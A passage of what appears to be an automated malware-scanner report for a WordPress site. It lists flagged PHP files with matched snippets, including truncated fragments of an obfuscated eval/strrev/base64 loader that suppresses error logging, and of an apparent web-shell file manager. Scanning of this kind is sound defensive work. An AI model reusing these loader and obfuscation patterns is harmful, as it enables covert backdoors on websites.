</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 820</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">3</span><span style="color: #007700">: </span><span style="color: #DD0000">'url' </span><span style="color: #0000BB">argument</span><span style="color: #007700">. */</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 821</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">. Use </span><span style="color: #0000BB">the </span><span style="color: #007700">%</span><span style="color: #0000BB">3$s option instead</span><span style="color: #007700">.</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 901</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 902</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">. Use </span><span style="color: #0000BB">the </span><span style="color: #007700">%</span><span style="color: #0000BB">3$s </span><span style="color: #007700">function </span><span style="color: #0000BB">instead</span><span style="color: #007700">.</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 908</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_rtl' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 927</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by get_bloginfo</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by bloginfo</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 952</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the Site Icon URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Site Icon URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 961</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_site_icon_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$size </span><span style="color: #007700">= </span><span style="color: #0000BB">512</span><span style="color: #007700">, </span><span style="color: #0000BB">$url </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 993</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_site_icon_url'</span><span style="color: #007700">, </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$size</span><span style="color: #007700">, </span><span style="color: #0000BB">$blog_id </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_61").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/xLVaSKA2IYO.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_62" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_62").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/X5fAijwVKRh.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:11:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_63" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_63").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/l10n/page-template-1769473585.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:26:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:26:47</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_64" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: 